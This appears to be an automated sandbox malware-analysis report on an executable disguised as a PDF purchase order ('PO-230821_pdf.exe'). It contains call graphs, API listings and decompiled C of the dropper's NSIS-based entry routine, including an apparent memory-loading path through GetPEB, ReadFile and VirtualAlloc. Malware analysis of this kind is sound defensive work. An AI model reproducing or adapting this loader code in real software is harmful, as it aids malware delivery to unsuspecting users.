7644->7693 7647 2451074 7646->7647 7647->7601 7649 24510db 7648->7649 7650 245013e GetPEB 7649->7650 7651 24510fc 7650->7651 7652 2451146 7651->7652 7653 2451100 7651->7653 7696 2451682 7652->7696 7654 2450dc0 10 API calls 7653->7654 7656 245113b 7654->7656 7656->7601 7658 2451184 7657->7658 7659 245013e GetPEB 7658->7659 7660 24511a5 7659->7660 7661 24511ef 7660->7661 7662 24511a9 7660->7662 7699 245163a 7661->7699 7663 2450dc0 10 API calls 7662->7663 7665 24511e4 7663->7665 7665->7602 7667 2450160 7666->7667 7667->7633 7686 245005f GetPEB 7668->7686 7670 2450e09 7687 2450109 GetPEB 7670->7687 7673 2450e96 7674 2450ea7 VirtualAlloc 7673->7674 7679 2450f6b 7673->7679 7675 2450ebd ReadFile 7674->7675 7674->7679 7676 2450ed2 VirtualAlloc 7675->7676 7675->7679 7676->7679 7680 2450ef3 7676->7680 7677 2450fb4 7677->7638 7678 2450fa9 VirtualFree 7678->7677 7679->7677 7679->7678 7680->7679 7681 2450f5e VirtualFree 7680->7681 7682 2450f5a FindCloseChangeNotification 7680->7682 7681->7679 7682->7681 7684 2450dc0 10 API calls 7683->7684 7685 2451656 7684->7685 7685->7638 7686->7670 7688 245011c 7687->7688 7690 2450131 CreateFileW 7688->7690 7691 245017b GetPEB 7688->7691 7690->7673 7690->7679 7692 245019f 7691->7692 7692->7688 7694 2450dc0 10 API calls 7693->7694 7695 245167a 7694->7695 7695->7647 7697 2450dc0 10 API calls 7696->7697 7698 245168c 7697->7698 7698->7656 7700 2450dc0 10 API calls 7699->7700 7701 2451644 7700->7701 7701->7665

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 56 4038e9-4038ea 41->56 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 67 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->67 63 40399b-4039a1 48->63 64 403b6c-403b7a call 403c25 OleUninitialize 48->64 51->46 51->52 52->46 60 4038d0-4038d4 53->60 61 4038d6-4038d8 53->61 54->53 58 403881-403889 54->58 56->32 65 403890 58->65 66 40388b-40388e 58->66 60->61 62 4038f9-403906 call 406668 60->62 61->41 62->37 69 4039a7-4039ba call 405f64 63->69 70 403a48-403a4f call 403d17 63->70 79 403b91-403b97 64->79 80 403b7c-403b8b call 405cc8 ExitProcess 64->80 65->53 66->53 66->65 67->48 67->64 83 403a0c-403a19 69->83 84 4039bc-4039f1 69->84 78 403a54-403a57 70->78 78->64 81 403b99-403bae GetCurrentProcess OpenProcessToken 79->81 82 403c0f-403c17 79->82 87 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 81->87 88 403bdf-403bed call 406a35 81->88 90 403c19 82->90 91 403c1c-403c1f ExitProcess 82->91 92 403a1b-403a29 call 40603f 83->92 93 403a5c-403a70 call 405c33 lstrcatW 83->93 89 4039f3-4039f7 84->89 87->88 104 403bfb-403c06 ExitWindowsEx 88->104 105 403bef-403bf9 88->105 96 403a00-403a08 89->96 97 4039f9-4039fe 89->97 90->91 92->64 103 403a2f-403a45 call 406668 * 2 92->103 106 403a72-403a78 lstrcatW 93->106 107 403a7d-403a97 lstrcatW lstrcmpiW 93->107 96->89 101 403a0a 96->101 97->96 97->101 101->83 103->70 104->82 109 403c08-403c0a call 40140b 104->109 105->104 105->109 106->107 110 403b6a 107->110 111 403a9d-403aa0 107->111 109->82 110->64 112 403aa2-403aa7 call 405b99 111->112 113 403aa9 call 405c16 111->113 121 403aae-403abe SetCurrentDirectoryW 112->121 113->121 123 403ac0-403ac6 call 406668 121->123 124 403acb-403af7 call 406668 121->124 123->124 128 403afc-403b17 call 4066a5 DeleteFileW 124->128 131 403b57-403b61 128->131 132 403b19-403b29 CopyFileW 128->132 131->128 133 403b63-403b65 call 406428 131->133 132->131 134 403b2b-403b4b call 406428 call 4066a5 call 405c4b 132->134 133->110 134->131 142 403b4d-403b54 CloseHandle 134->142 142->131
                                            C-Code - Quality: 79%
                                            			_entry_() {
                                            				WCHAR* _v8;
                                            				signed int _v12;
                                            				void* _v16;
                                            				signed int _v20;
                                            				int _v24;
                                            				int _v28;
                                            				struct _TOKEN_PRIVILEGES _v40;
                                            				signed char _v42;
                                            				int _v44;
                                            				signed int _v48;
                                            				intOrPtr _v278;
                                            				signed short _v310;
                                            				struct _OSVERSIONINFOW _v324;
                                            				struct _SHFILEINFOW _v1016;
                                            				intOrPtr* _t88;
                                            				WCHAR* _t92;
                                            				char* _t94;
                                            				void _t97;
                                            				void* _t116;
                                            				WCHAR* _t118;
                                            				signed int _t120;
                                            				intOrPtr* _t124;
                                            				void* _t138;
                                            				void* _t144;
                                            				void* _t149;
                                            				void* _t153;
                                            				void* _t158;
                                            				signed int _t168;
                                            				void* _t171;
                                            				void* _t176;
                                            				intOrPtr _t178;
                                            				intOrPtr _t179;
                                            				intOrPtr* _t180;
                                            				int _t189;
                                            				void* _t190;
                                            				void* _t199;
                                            				signed int _t205;
                                            				signed int _t210;
                                            				signed int _t215;
                                            				signed int _t217;
                                            				int* _t219;
                                            				signed int _t227;
                                            				signed int _t230;
                                            				CHAR* _t232;
                                            				char* _t233;
                                            				signed int _t234;
                                            				WCHAR* _t235;
                                            				void* _t251;
                                            
                                            				_t217 = 0x20;
                                            				_t189 = 0;
                                            				_v24 = 0;
                                            				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                            				_v20 = 0;
                                            				SetErrorMode(0x8001); // executed
                                            				_v324.szCSDVersion = 0;
                                            				_v48 = 0;
                                            				_v44 = 0;
                                            				_v324.dwOSVersionInfoSize = 0x11c;
                                            				if(GetVersionExW( &_v324) == 0) {
                                            					_v324.dwOSVersionInfoSize = 0x114;
                                            					GetVersionExW( &_v324);
                                            					asm("sbb eax, eax");
                                            					_v42 = 4;
                                            					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                            				}
                                            				if(_v324.dwMajorVersion < 0xa) {
                                            					_v310 = _v310 & 0x00000000;
                                            				}
                                            				 *0x42a318 = _v324.dwBuildNumber;
                                            				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                            				if( *0x42a31e != 0x600) {
                                            					_t180 = E00406A35(_t189);
                                            					if(_t180 != _t189) {
                                            						 *_t180(0xc00);
                                            					}
                                            				}
                                            				_t232 = "UXTHEME";
                                            				do {
                                            					E004069C5(_t232); // executed
                                            					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                            				} while ( *_t232 != 0);
                                            				E00406A35(0xb);
                                            				 *0x42a264 = E00406A35(9);
                                            				_t88 = E00406A35(7);
                                            				if(_t88 != _t189) {
                                            					_t88 =  *_t88(0x1e);
                                            					if(_t88 != 0) {
                                            						 *0x42a31c =  *0x42a31c | 0x00000080;
                                            					}
                                            				}
                                            				__imp__#17();
                                            				__imp__OleInitialize(_t189); // executed
                                            				 *0x42a320 = _t88;
                                            				SHGetFileInfoW(0x421708, _t189,  &_v1016, 0x2b4, _t189); // executed
                                            				E00406668(0x429260, L"NSIS Error");
                                            				_t92 = GetCommandLineW();
                                            				_t233 = L"\"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe\"";
                                            				E00406668(_t233, _t92);
                                            				_t94 = _t233;
                                            				_t234 = 0x22;
                                            				 *0x42a260 = 0x400000;
                                            				_t251 = L"\"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe\"" - _t234; // 0x22
                                            				if(_t251 == 0) {
                                            					_t217 = _t234;
                                            					_t94 =  &M00435002;
                                            				}
                                            				_t199 = CharNextW(E00405F64(_t94, _t217));
                                            				_v16 = _t199;
                                            				while(1) {
                                            					_t97 =  *_t199;
                                            					_t252 = _t97 - _t189;
                                            					if(_t97 == _t189) {
                                            						break;
                                            					}
                                            					_t210 = 0x20;
                                            					__eflags = _t97 - _t210;
                                            					if(_t97 != _t210) {
                                            						L17:
                                            						__eflags =  *_t199 - _t234;
                                            						_v12 = _t210;
                                            						if( *_t199 == _t234) {
                                            							_v12 = _t234;
                                            							_t199 = _t199 + 2;
                                            							__eflags = _t199;
                                            						}
                                            						__eflags =  *_t199 - 0x2f;
                                            						if( *_t199 != 0x2f) {
                                            							L32:
                                            							_t199 = E00405F64(_t199, _v12);
                                            							__eflags =  *_t199 - _t234;
                                            							if(__eflags == 0) {
                                            								_t199 = _t199 + 2;
                                            								__eflags = _t199;
                                            							}
                                            							continue;
                                            						} else {
                                            							_t199 = _t199 + 2;
                                            							__eflags =  *_t199 - 0x53;
                                            							if( *_t199 != 0x53) {
                                            								L24:
                                            								asm("cdq");
                                            								asm("cdq");
                                            								_t215 = L"NCRC" & 0x0000ffff;
                                            								asm("cdq");
                                            								_t227 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t215;
                                            								__eflags =  *_t199 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215);
                                            								if( *_t199 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215)) {
                                            									L29:
                                            									asm("cdq");
                                            									asm("cdq");
                                            									_t210 = L" /D=" & 0x0000ffff;
                                            									asm("cdq");
                                            									_t230 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t210;
                                            									__eflags =  *(_t199 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210);
                                            									if( *(_t199 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210)) {
                                            										L31:
                                            										_t234 = 0x22;
                                            										goto L32;
                                            									}
                                            									__eflags =  *_t199 - _t230;
                                            									if( *_t199 == _t230) {
                                            										 *(_t199 - 4) = _t189;
                                            										__eflags = _t199;
                                            										E00406668(L"C:\\Users\\Alvin\\AppData\\Local\\Temp", _t199);
                                            										L37:
                                            										_t235 = L"C:\\Users\\Alvin\\AppData\\Local\\Temp\\";
                                            										GetTempPathW(0x400, _t235);
                                            										_t116 = E0040360F(_t199, _t252);
                                            										_t253 = _t116;
                                            										if(_t116 != 0) {
                                            											L40:
                                            											DeleteFileW(L"1033"); // executed
                                            											_t118 = E004030D0(_t255, _v20); // executed
                                            											_v8 = _t118;
                                            											if(_t118 != _t189) {
                                            												L68:
                                            												E00403C25();
                                            												__imp__OleUninitialize();
                                            												if(_v8 == _t189) {
                                            													if( *0x42a2f4 == _t189) {
                                            														L77:
                                            														_t120 =  *0x42a30c;
                                            														if(_t120 != 0xffffffff) {
                                            															_v24 = _t120;
                                            														}
                                            														ExitProcess(_v24);
                                            													}
                                            													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                            														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                            														_v40.PrivilegeCount = 1;
                                            														_v28 = 2;
                                            														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                            													}
                                            													_t124 = E00406A35(4);
                                            													if(_t124 == _t189) {
                                            														L75:
                                            														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                            															goto L77;
                                            														}
                                            														goto L76;
                                            													} else {
                                            														_push(0x80040002);
                                            														_push(0x25);
                                            														_push(_t189);
                                            														_push(_t189);
                                            														_push(_t189);
                                            														if( *_t124() == 0) {
                                            															L76:
                                            															E0040140B(9);
                                            															goto L77;
                                            														}
                                            														goto L75;
                                            													}
                                            												}
                                            												E00405CC8(_v8, 0x200010);
                                            												ExitProcess(2);
                                            											}
                                            											if( *0x42a27c == _t189) {
                                            												L51:
                                            												 *0x42a30c =  *0x42a30c | 0xffffffff;
                                            												_v24 = E00403D17(_t265);
                                            												goto L68;
                                            											}
                                            											_t219 = E00405F64(L"\"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe\"", _t189);
                                            											if(_t219 < L"\"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe\"") {
                                            												L48:
                                            												_t264 = _t219 - L"\"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe\"";
                                            												_v8 = L"Error launching installer";
                                            												if(_t219 < L"\"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe\"") {
                                            													_t190 = E00405C33(__eflags);
                                            													lstrcatW(_t235, L"~nsu");
                                            													__eflags = _t190;
                                            													if(_t190 != 0) {
                                            														lstrcatW(_t235, "A");
                                            													}
                                            													lstrcatW(_t235, L".tmp");
                                            													_t220 = L"C:\\Users\\Alvin\\Desktop";
                                            													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Alvin\\Desktop");
                                            													__eflags = _t138;
                                            													if(_t138 == 0) {
                                            														L67:
                                            														_t189 = 0;
                                            														__eflags = 0;
                                            														goto L68;
                                            													} else {
                                            														__eflags = _t190;
                                            														_push(_t235);
                                            														if(_t190 == 0) {
                                            															E00405C16();
                                            														} else {
                                            															E00405B99();
                                            														}
                                            														SetCurrentDirectoryW(_t235);
                                            														__eflags = L"C:\\Users\\Alvin\\AppData\\Local\\Temp"; // 0x43
                                            														if(__eflags == 0) {
                                            															E00406668(L"C:\\Users\\Alvin\\AppData\\Local\\Temp", _t220);
                                            														}
                                            														E00406668(0x42b000, _v16);
                                            														_t202 = "A" & 0x0000ffff;
                                            														_t144 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                            														__eflags = _t144;
                                            														_v12 = 0x1a;
                                            														 *0x42b800 = _t144;
                                            														do {
                                            															E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                                            															DeleteFileW(0x420f08);
                                            															__eflags = _v8;
                                            															if(_v8 != 0) {
                                            																_t149 = CopyFileW(L"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe", 0x420f08, 1);
                                            																__eflags = _t149;
                                            																if(_t149 != 0) {
                                            																	E00406428(_t202, 0x420f08, 0);
                                            																	E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                                            																	_t153 = E00405C4B(0x420f08);
                                            																	__eflags = _t153;
                                            																	if(_t153 != 0) {
                                            																		CloseHandle(_t153);
                                            																		_v8 = 0;
                                            																	}
                                            																}
                                            															}
                                            															 *0x42b800 =  *0x42b800 + 1;
                                            															_t61 =  &_v12;
                                            															 *_t61 = _v12 - 1;
                                            															__eflags =  *_t61;
                                            														} while ( *_t61 != 0);
                                            														E00406428(_t202, _t235, 0);
                                            														goto L67;
                                            													}
                                            												}
                                            												 *_t219 = _t189;
                                            												_t222 =  &(_t219[2]);
                                            												_t158 = E0040603F(_t264,  &(_t219[2]));
                                            												_t265 = _t158;
                                            												if(_t158 == 0) {
                                            													goto L68;
                                            												}
                                            												E00406668(L"C:\\Users\\Alvin\\AppData\\Local\\Temp", _t222);
                                            												E00406668(L"C:\\Users\\Alvin\\AppData\\Local\\Temp", _t222);
                                            												_v8 = _t189;
                                            												goto L51;
                                            											}
                                            											asm("cdq");
                                            											asm("cdq");
                                            											asm("cdq");
                                            											_t205 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                            											_t168 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                            											while( *_t219 != _t205 || _t219[1] != _t168) {
                                            												_t219 = _t219;
                                            												if(_t219 >= L"\"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe\"") {
                                            													continue;
                                            												}
                                            												break;
                                            											}
                                            											_t189 = 0;
                                            											goto L48;
                                            										}
                                            										GetWindowsDirectoryW(_t235, 0x3fb);
                                            										lstrcatW(_t235, L"\\Temp");
                                            										_t171 = E0040360F(_t199, _t253);
                                            										_t254 = _t171;
                                            										if(_t171 != 0) {
                                            											goto L40;
                                            										}
                                            										GetTempPathW(0x3fc, _t235);
                                            										lstrcatW(_t235, L"Low");
                                            										SetEnvironmentVariableW(L"TEMP", _t235);
                                            										SetEnvironmentVariableW(L"TMP", _t235);
                                            										_t176 = E0040360F(_t199, _t254);
                                            										_t255 = _t176;
                                            										if(_t176 == 0) {
                                            											goto L68;
                                            										}
                                            										goto L40;
                                            									}
                                            									goto L31;
                                            								}
                                            								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                            								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                            									goto L29;
                                            								}
                                            								_t178 =  *((intOrPtr*)(_t199 + 8));
                                            								__eflags = _t178 - 0x20;
                                            								if(_t178 == 0x20) {
                                            									L28:
                                            									_t36 =  &_v20;
                                            									 *_t36 = _v20 | 0x00000004;
                                            									__eflags =  *_t36;
                                            									goto L29;
                                            								}
                                            								__eflags = _t178 - _t189;
                                            								if(_t178 != _t189) {
                                            									goto L29;
                                            								}
                                            								goto L28;
                                            							}
                                            							_t179 =  *((intOrPtr*)(_t199 + 2));
                                            							__eflags = _t179 - _t210;
                                            							if(_t179 == _t210) {
                                            								L23:
                                            								 *0x42a300 = 1;
                                            								goto L24;
                                            							}
                                            							__eflags = _t179 - _t189;
                                            							if(_t179 != _t189) {
                                            								goto L24;
                                            							}
                                            							goto L23;
                                            						}
                                            					} else {
                                            						goto L16;
                                            					}
                                            					do {
                                            						L16:
                                            						_t199 = _t199 + 2;
                                            						__eflags =  *_t199 - _t210;
                                            					} while ( *_t199 == _t210);
                                            					goto L17;
                                            				}
                                            				goto L37;
                                            			}



















































                                            0x0040364e
                                            0x0040364f
                                            0x00403656
                                            0x00403659
                                            0x00403660
                                            0x00403663
                                            0x00403676
                                            0x0040367c
                                            0x0040367f
                                            0x00403682
                                            0x00403690
                                            0x00403698
                                            0x004036a3
                                            0x004036bc
                                            0x004036be
                                            0x004036c6
                                            0x004036c6
                                            0x004036d1
                                            0x004036d3
                                            0x004036d3
                                            0x004036e8
                                            0x0040370d
                                            0x0040371b
                                            0x0040371e
                                            0x00403725
                                            0x0040372c
                                            0x0040372c
                                            0x00403725
                                            0x0040372e
                                            0x00403733
                                            0x00403734
                                            0x00403740
                                            0x00403744
                                            0x0040374b
                                            0x00403759
                                            0x0040375e
                                            0x00403765
                                            0x00403769
                                            0x0040376d
                                            0x0040376f
                                            0x0040376f
                                            0x0040376d
                                            0x00403776
                                            0x0040377d
                                            0x00403783
                                            0x0040379b
                                            0x004037ab
                                            0x004037b0
                                            0x004037b6
                                            0x004037bd
                                            0x004037c4
                                            0x004037c6
                                            0x004037c7
                                            0x004037d1
                                            0x004037d8
                                            0x004037da
                                            0x004037dc
                                            0x004037dc
                                            0x004037ef
                                            0x004037f1
                                            0x004038eb
                                            0x004038eb
                                            0x004038ee
                                            0x004038f1
                                            0x00000000
                                            0x00000000
                                            0x004037fb
                                            0x004037fc
                                            0x004037ff
                                            0x00403808
                                            0x00403808
                                            0x0040380b
                                            0x0040380e
                                            0x00403811
                                            0x00403814
                                            0x00403814
                                            0x00403814
                                            0x00403815
                                            0x00403819
                                            0x004038d9
                                            0x004038e2
                                            0x004038e4
                                            0x004038e7
                                            0x004038ea
                                            0x004038ea
                                            0x004038ea
                                            0x00000000
                                            0x0040381f
                                            0x00403820
                                            0x00403821
                                            0x00403825
                                            0x0040383f
                                            0x00403846
                                            0x00403859
                                            0x0040385a
                                            0x0040386f
                                            0x00403874
                                            0x00403876
                                            0x00403878
                                            0x00403894
                                            0x0040389b
                                            0x004038ae
                                            0x004038af
                                            0x004038c4
                                            0x004038ca
                                            0x004038cc
                                            0x004038ce
                                            0x004038d6
                                            0x004038d8
                                            0x00000000
                                            0x004038d8
                                            0x004038d2
                                            0x004038d4
                                            0x004038f9
                                            0x004038fd
                                            0x00403906
                                            0x0040390b
                                            0x00403911
                                            0x0040391c
                                            0x0040391e
                                            0x00403923
                                            0x00403925
                                            0x0040397d
                                            0x00403982
                                            0x0040398b
                                            0x00403992
                                            0x00403995
                                            0x00403b6c
                                            0x00403b6c
                                            0x00403b71
                                            0x00403b7a
                                            0x00403b97
                                            0x00403c0f
                                            0x00403c0f
                                            0x00403c17
                                            0x00403c19
                                            0x00403c19
                                            0x00403c1f
                                            0x00403c1f
                                            0x00403bae
                                            0x00403bba
                                            0x00403bcb
                                            0x00403bd2
                                            0x00403bd9
                                            0x00403bd9
                                            0x00403be1
                                            0x00403bed
                                            0x00403bfb
                                            0x00403c06
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403bef
                                            0x00403bef
                                            0x00403bf0
                                            0x00403bf2
                                            0x00403bf3
                                            0x00403bf4
                                            0x00403bf9
                                            0x00403c08
                                            0x00403c0a
                                            0x00000000
                                            0x00403c0a
                                            0x00000000
                                            0x00403bf9
                                            0x00403bed
                                            0x00403b84
                                            0x00403b8b
                                            0x00403b8b
                                            0x004039a1
                                            0x00403a48
                                            0x00403a48
                                            0x00403a54
                                            0x00000000
                                            0x00403a54
                                            0x004039b2
                                            0x004039ba
                                            0x00403a0c
                                            0x00403a0c
                                            0x00403a12
                                            0x00403a19
                                            0x00403a67
                                            0x00403a69
                                            0x00403a6e
                                            0x00403a70
                                            0x00403a78
                                            0x00403a78
                                            0x00403a83
                                            0x00403a88
                                            0x00403a8f
                                            0x00403a95
                                            0x00403a97
                                            0x00403b6a
                                            0x00403b6a
                                            0x00403b6a
                                            0x00000000
                                            0x00403a9d
                                            0x00403a9d
                                            0x00403a9f
                                            0x00403aa0
                                            0x00403aa9
                                            0x00403aa2
                                            0x00403aa2
                                            0x00403aa2
                                            0x00403aaf
                                            0x00403ab7
                                            0x00403abe
                                            0x00403ac6
                                            0x00403ac6
                                            0x00403ad3
                                            0x00403adf
                                            0x00403ae9
                                            0x00403ae9
                                            0x00403aeb
                                            0x00403af2
                                            0x00403afc
                                            0x00403b08
                                            0x00403b0e
                                            0x00403b14
                                            0x00403b17
                                            0x00403b21
                                            0x00403b27
                                            0x00403b29
                                            0x00403b2d
                                            0x00403b3e
                                            0x00403b44
                                            0x00403b49
                                            0x00403b4b
                                            0x00403b4e
                                            0x00403b54
                                            0x00403b54
                                            0x00403b4b
                                            0x00403b29
                                            0x00403b57
                                            0x00403b5e
                                            0x00403b5e
                                            0x00403b5e
                                            0x00403b5e
                                            0x00403b65
                                            0x00000000
                                            0x00403b65
                                            0x00403a97
                                            0x00403a1b
                                            0x00403a1e
                                            0x00403a22
                                            0x00403a27
                                            0x00403a29
                                            0x00000000
                                            0x00000000
                                            0x00403a35
                                            0x00403a40
                                            0x00403a45
                                            0x00000000
                                            0x00403a45
                                            0x004039c3
                                            0x004039db
                                            0x004039ec
                                            0x004039ed
                                            0x004039f1
                                            0x004039f3
                                            0x00403a01
                                            0x00403a08
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403a08
                                            0x00403a0a
                                            0x00000000
                                            0x00403a0a
                                            0x0040392d
                                            0x00403939
                                            0x0040393e
                                            0x00403943
                                            0x00403945
                                            0x00000000
                                            0x00000000
                                            0x0040394d
                                            0x00403955
                                            0x00403966
                                            0x0040396e
                                            0x00403970
                                            0x00403975
                                            0x00403977
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403977
                                            0x00000000
                                            0x004038d4
                                            0x0040387d
                                            0x0040387f
                                            0x00000000
                                            0x00000000
                                            0x00403881
                                            0x00403885
                                            0x00403889
                                            0x00403890
                                            0x00403890
                                            0x00403890
                                            0x00403890
                                            0x00000000
                                            0x00403890
                                            0x0040388b
                                            0x0040388e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040388e
                                            0x00403827
                                            0x0040382b
                                            0x0040382e
                                            0x00403835
                                            0x00403835
                                            0x00000000
                                            0x00403835
                                            0x00403830
                                            0x00403833
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403833
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403801
                                            0x00403801
                                            0x00403802
                                            0x00403803
                                            0x00403803
                                            0x00000000
                                            0x00403801
                                            0x00000000

                                            APIs
                                            • SetErrorMode.KERNEL32(00008001), ref: 00403663
                                            • GetVersionExW.KERNEL32(?), ref: 0040368C
                                            • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                            • OleInitialize.OLE32(00000000), ref: 0040377D
                                            • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                            • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PO-230821_pdf.exe",00000020,"C:\Users\user\Desktop\PO-230821_pdf.exe",00000000), ref: 004037E9
                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                            • DeleteFileW.KERNEL32(1033), ref: 00403982
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                              • Part of subcall function 00405C16: CreateDirectoryW.KERNEL32(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PO-230821_pdf.exe",00000000,?), ref: 00403A8F
                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                            • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\PO-230821_pdf.exe,00420F08,00000001), ref: 00403B21
                                            • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                            • OleUninitialize.OLE32(?), ref: 00403B71
                                            • ExitProcess.KERNEL32 ref: 00403B8B
                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                            • ExitProcess.KERNEL32 ref: 00403C1F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
